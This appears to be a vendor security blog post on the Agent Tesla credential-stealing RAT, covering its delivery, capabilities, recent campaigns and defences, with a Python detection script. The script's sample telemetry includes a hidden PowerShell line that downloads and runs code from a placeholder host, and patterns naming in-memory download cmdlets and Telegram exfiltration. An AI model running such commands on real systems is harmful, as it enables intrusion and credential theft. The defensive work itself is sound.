
Agent Tesla Returns: The Old RAT with New Tricks

Introduction

Cohesity REDLab has released updates to its threat library in response to renewed activity related to Agent Tesla, a Remote Access Trojan (RAT) and credential stealer. The Center for Internet Security (CIS) recently added Agent Tesla to its Top 10 malware list for Q3 of 2025. Agent Tesla has evolved into one of the most prevalent malware families targeting organizations worldwide. First observed in 2014, Agent Tesla is written in .NET and is widely distributed via phishing campaigns, malicious attachments, and exploit kits. Its adaptability and modular design make it a persistent threat to enterprise environments, especially as attackers refine delivery techniques to bypass modern defenses.

How Agent Tesla Works

  • Initial Delivery: Socially engineered emails, often impersonating trusted brands, deliver compressed archives containing obfuscated JavaScript or malicious executables. 
  • Scripted Execution: The JavaScript downloader fetches a PowerShell script from a remote server, which then loads the Agent Tesla payload directly into memory. This in-memory execution, coupled with process injection, helps the malware evade endpoint detection. 
  • Persistence and Evasion: Agent Tesla modifies registry keys for persistence and uses process hollowing to inject itself into legitimate Windows processes, complicating forensic analysis. 

Capabilities

Agent Tesla is a full-featured RAT with the following capabilities:

  • Credential Theft: Extracts credentials from browsers, email clients, FTP/VPN software, and Windows Credential Vaults.
  • Keylogging and Clipboard Capture: Records keystrokes and clipboard data for exfiltration.
  • Screen Capture: Takes screenshots to gather sensitive information.
  • Data Exfiltration: Uses SMTP, FTP, HTTP, and even Telegram APIs for command-and-control (C2) and data exfiltration.
  • Obfuscation and Anti-Analysis: Employs packing, code obfuscation, and disables security tools to hinder detection.
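A defender-side illustration of the delivery chain and the exfiltration channels described above: this is example code added for this post, not Cohesity's or REDLab's detection logic. It scores constructed Sysmon-style events per host (a script host spawning a PowerShell downloader that runs code in memory, a Run-key write by PowerShell, and outbound traffic to the Telegram API or to mail/FTP ports from a process that is not a mail client); the event field names, host names and placeholder URL are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs); host names, paths and the
# placeholder URL are assumptions for the example.
SAMPLE_EVENTS = [
    {"host_id": "WS-01", "type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s')\""},
    {"host_id": "WS-01", "type": "registry", "image": "powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"host_id": "WS-01", "type": "network", "image": "svchost.exe", "dest": "api.telegram.org", "port": 443},  # hollowed host stand-in
    {"host_id": "WS-02", "type": "process", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell -c Get-Date"},
    {"host_id": "WS-02", "type": "network", "image": "outlook.exe", "dest": "mail.corp.invalid", "port": 587},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}            # JavaScript downloader stage
INMEM_DOWNLOAD = re.compile(r"\b(DownloadString|DownloadData|Invoke-WebRequest|iwr|IEX|Invoke-Expression|FromBase64String)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)  # registry persistence
MAIL_FTP_PORTS = {21, 25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}        # processes expected to talk SMTP

def classify(event):
    """Map one event to a (reason, weight) finding, or None if it looks benign."""
    kind, image = event["type"], event["image"].lower()
    if kind == "process" and image == "powershell.exe" and event["parent"].lower() in SCRIPT_HOSTS:
        if INMEM_DOWNLOAD.search(event["cmdline"]):
            return ("script host launched PowerShell that downloads and runs code in memory", 3)
        return ("script host launched PowerShell", 1)
    if kind == "registry" and image == "powershell.exe" and RUN_KEY.search(event["key"]):
        return ("PowerShell wrote a Run-key persistence entry", 2)
    if kind == "network":
        if event["dest"].lower().endswith("api.telegram.org"):
            return ("connection to the Telegram bot API", 2)
        if event["port"] in MAIL_FTP_PORTS and image not in MAIL_CLIENTS:
            return (f"non-mail process {image} used SMTP/FTP port {event['port']}", 2)
    return None

def score_hosts(events):
    """Aggregate findings per host: {host_id: (score, [reasons])}."""
    per_host = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit:
            per_host[ev["host_id"]].append(hit)
    return {h: (sum(w for _, w in hits), [r for r, _ in hits]) for h, hits in per_host.items()}

def flagged(events, threshold=5):
    """Hosts whose combined score reaches the threshold; a single weak signal is not enough."""
    return sorted(h for h, (score, _) in score_hosts(events).items() if score >= threshold)
```

Weighting the stages and summing per host keeps a lone PowerShell launch from paging anyone, while the full chain on one machine crosses the threshold.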

Recent Campaigns and Trends

Multi-Stage Attacks

2025 saw a surge in sophisticated Agent Tesla campaigns employing multi-stage delivery chains. Attackers use layered scripts and payloads to evade static and behavioral detection. For example, recent campaigns targeted global sectors (like finance, manufacturing, and education) using WeTransfer-themed lures and QR code phishing tactics. 

Geographic Targeting

Targeted campaigns have been observed against organizations in the United States, Australia, Taiwan, and Mexico. Attackers leverage business email databases and compromised accounts to maximize infection rates. 

Technical Innovation

New loaders like QuirkyLoader facilitate DLL side-loading and process hollowing, further complicating detection and response.

REDLab’s Role in Enterprise Defense

Cohesity’s REDLab is a fully isolated, in-house security lab dedicated to validating cyber resilience against real-world threats. REDLab simulates attacks using live malware, including Agent Tesla, to benchmark detection accuracy and recovery capabilities. Key REDLab contributions include:

  • Real-World Attack Simulation: Testing Cohesity’s products against the latest malware variants in an air-gapped environment.
  • Detection Mechanism Development: Creating and updating the Cohesity Threat Library to identify and respond to threats like Agent Tesla.
  • Continuous Feedback Loop: Providing actionable intelligence to engineering teams to improve threat detection and recovery logic.

Defensive Strategies

Detection

  • Rapid Threat Hunt: Use Cohesity Rapid Threat Hunts to hunt for malware using threat intelligence feeds. These feeds are updated daily with new information from intelligence sources such as Google Threat Intelligence, CISA, Cohesity REDLab, open-source feeds, and others. Users can search using the default feeds or create custom feeds.
  • Threat Scans: Run periodic threat scans using the default threat library, which is updated daily, or create custom YARA rules. Users can also use third-party integrations and threat intelligence vendors.
  • Anti-ransomware: Users are advised to closely monitor the ML-based anti-ransomware backup anomalies in Security Center to detect ransomware activity.

Response and Recovery

  • Immutable Backups: Maintain air-gapped, immutable backups to ensure rapid recovery after an attack.
  • Automated Recovery: Use solutions like Cohesity’s Recovery Agent for single-click cyber recovery and clean-room restoration. 
  • Incident Response Playbooks: Prepare for multi-stage attacks with rehearsed response plans and stakeholder coordination.
  • Threat Detection: Use threat detection features mentioned above before recovery to make sure that snapshots are clean.

Conclusion

Agent Tesla exemplifies the evolving sophistication of malware targeting enterprises. Its modular design, credential theft capabilities, and multi-stage delivery chains demand adaptive, intelligence-driven defenses. Cohesity REDLab’s proactive research and validation provide organizations with the tools and insights needed to detect, respond to, and recover from Agent Tesla and similar threats.

For the latest advisories and technical details, visit Cohesity REDLab.